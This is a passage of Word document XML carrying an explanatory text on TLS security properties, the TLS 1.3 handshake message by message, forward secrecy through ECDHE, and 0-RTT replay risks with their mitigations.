        <w:t>content injection</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D8AD84" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authentication (Certificate validation):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The server proves its identity via a certificate signed by a trusted Certificate Authority. The client verifies the certificate chain to a trusted root. This prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS hijacking + impersonation</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — even if an attacker redirects your DNS to their server, they can't present a valid certificate for bank.com (they don't have the private key, and they can't get a trusted certificate without controlling the domain). Without authentication, encrypted traffic with an unauthenticated server is still vulnerable to man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21858A14" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What TLS does NOT provide:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0EF50A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="829"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anonymity:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The server's hostname is in the TLS SNI extension (cleartext in TLS 1.2 and 1.3 unless ECH is used). The server's IP is always visible. Traffic volume and timing are visible. TLS encrypts content, not metadata.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DB36F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="829"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Perfect forward secrecy (unless ECDHE is used):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> With RSA key exchange (deprecated in TLS 1.3), if the server's private key is later compromised, an attacker who captured encrypted traffic can retroactively decrypt it. ECDHE (Elliptic Curve Diffie-Hellman Ephemeral) generates fresh session keys not derived from the server's private key — compromise of the long-term key doesn't decrypt past sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD822EE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS 1.3 Handshake — Full Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C0DAB4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>TLS 1.3 (RFC 8446, 2018) reduced the handshake from 2 RTTs (TLS 1.2) to </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1 RTT</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> and eliminated weak cipher suites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9307DB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The complete TLS 1.3 1-RTT handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A11595" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client → Server: ClientHello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5B160" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523264D9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Version: TLS 1.3 (encoded as TLS 1.2 for compatibility with middleboxes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7253C2C7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Random: 32 bytes of cryptographically secure random data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1264465B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Session ID: (legacy field, used for middlebox compatibility)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEBC07D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cipher Suites: [TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_AES_128_GCM_SHA256]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44546E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E67AB58" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  supported_versions: [TLS 1.3, TLS 1.2]  (real version negotiation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A252F54" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  supported_groups: [x25519, secp256r1, secp384r1]  (ECDHE curves supported)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9573C6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  key_share: [{group: x25519, key_exchange: &lt;DH public key&gt;}]  (client's ECDHE public key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438726A1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  signature_algorithms: [ecdsa_secp256r1_sha256, rsa_pss_rsae_sha256, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1D511" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  server_name: www.example.com  (SNI — hostname in cleartext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB7BA34" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  alpn: [h2, http/1.1]  (Application Layer Protocol Negotiation — HTTP/2 or HTTP/1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F2C3D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  psk_key_exchange_modes: [psk_dhe_ke]  (for 0-RTT resumption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770107B5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  pre_shared_key: &lt;session_ticket_identity&gt;  (for 0-RTT, if resuming)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91AC00" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Server → Client: ServerHello + encrypted extensions + Certificate + CertificateVerify + Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588088F0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>After receiving ClientHello:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561252A7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="830"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Server selects cipher suite, ECDHE group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F9A6FD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="830"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Server generates its own ECDHE key pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F87F4FA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="830"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Both sides compute the shared secret</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (via ECDHE key exchange — client's public key + server's private key = same shared secret as server's public key + client's private key). This is the Diffie-Hellman property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCDF614" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="830"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>From the shared secret, both sides independently derive </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiple symmetric keys</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> using HKDF (HMAC-based Key Derivation Function):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6166669C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="830"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Handshake traffic keys (for encrypting the rest of the handshake).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B4690" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="830"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Application traffic keys (for encrypting HTTP data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044EDEA1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="830"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Exporter keys (for application-level key binding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF7192" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B74D8E3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>ServerHello:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB1570E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Version: TLS 1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A657EB6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Random: 32 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BB0906" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Cipher Suite: TLS_AES_256_GCM_SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55FD39" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E06FF1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">    supported_versions: TLS 1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02332A53" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">    key_share: {group: x25519, key_exchange: &lt;server's DH public key&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEB6759" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>After ServerHello, </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all subsequent messages are encrypted</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> with the handshake traffic keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E8C031" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7021CFC5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>EncryptedExtensions: (encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2CACB4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  alpn: h2  (server selected HTTP/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA6436" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131337E6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Certificate: (encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63542295" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Certificate chain: [server_cert, intermediate_cert]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF9887" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4B4A30" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>CertificateVerify: (encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2569D06E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  Signature over the transcript hash (proves server owns the private key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676DE041" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4104B6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Finished: (encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425EB7EC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  MAC over the entire handshake transcript (integrity verification)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C2B1AD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client → Server: Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362704A1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9529B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Finished: (encrypted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F12CE0A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">  MAC over the entire handshake transcript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F772548" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>After this, </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application data begins flowing</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — HTTP requests and responses, encrypted with the application traffic keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DE1838" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Total: 1 RTT</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (ClientHello sent, server responds with everything, client sends Finished simultaneously with first HTTP request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B53E6BF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ECDHE key exchange — why perfect forward secrecy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC81564" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>ECDHE (Elliptic Curve Diffie-Hellman Ephemeral) generates a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fresh key pair per connection</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. The session keys are derived from these ephemeral keys — not from the server's long-term private key. If the server's private key is compromised years later, </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>past captured sessions cannot be decrypted</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> because the ephemeral keys that derived those sessions' symmetric keys are gone — they were never stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E9554C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Contrast with RSA key exchange (deprecated in TLS 1.3): the client encrypts the session key with the server's public key. The server decrypts it with its private key. If the private key is compromised later, all captured sessions can be decrypted. RSA key exchange has </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>no forward secrecy</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7A38BF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS 1.3 0-RTT Resumption — The Trade-off:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DFE634" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>For resumed sessions, the client sends data in the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>first packet</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> using a PSK (Pre-Shared Key) from the previous session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638F4B9B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5456BF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Client → Server: ClientHello + 0-RTT early data (HTTP/3 request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90A445" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Server → Client: ServerHello + server's response (can start with 0-RTT data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FABE75" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The 0-RTT replay attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E699513" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>0-RTT data is sent before the server has proven it's live (before the handshake completes). An attacker who captures the 0-RTT packet can </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>replay</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> it to the server — the server receives the same request again. If the request is idempotent (GET — safe to replay), this is harmless. If the request is non-idempotent (POST — creates an order, processes a payment), replay can cause </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>duplicate operations</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388DC70" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047D62B3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="831"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Only allow 0-RTT for idempotent requests</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (GET, HEAD). Servers must reject 0-RTT for POST, PUT, DELETE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59400E5F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="831"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Anti-replay mechanisms:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Servers maintain a database of seen session ticket nonces. Reject any 0-RTT with a previously seen nonce. Only effective for a single server (not across a distributed cluster without coordination).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097425D6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="831"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single-use session tickets:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Each session ticket can only be used once. After 0-RTT, the ticket is invalidated. Requires server-side state tracking per ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DC359E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
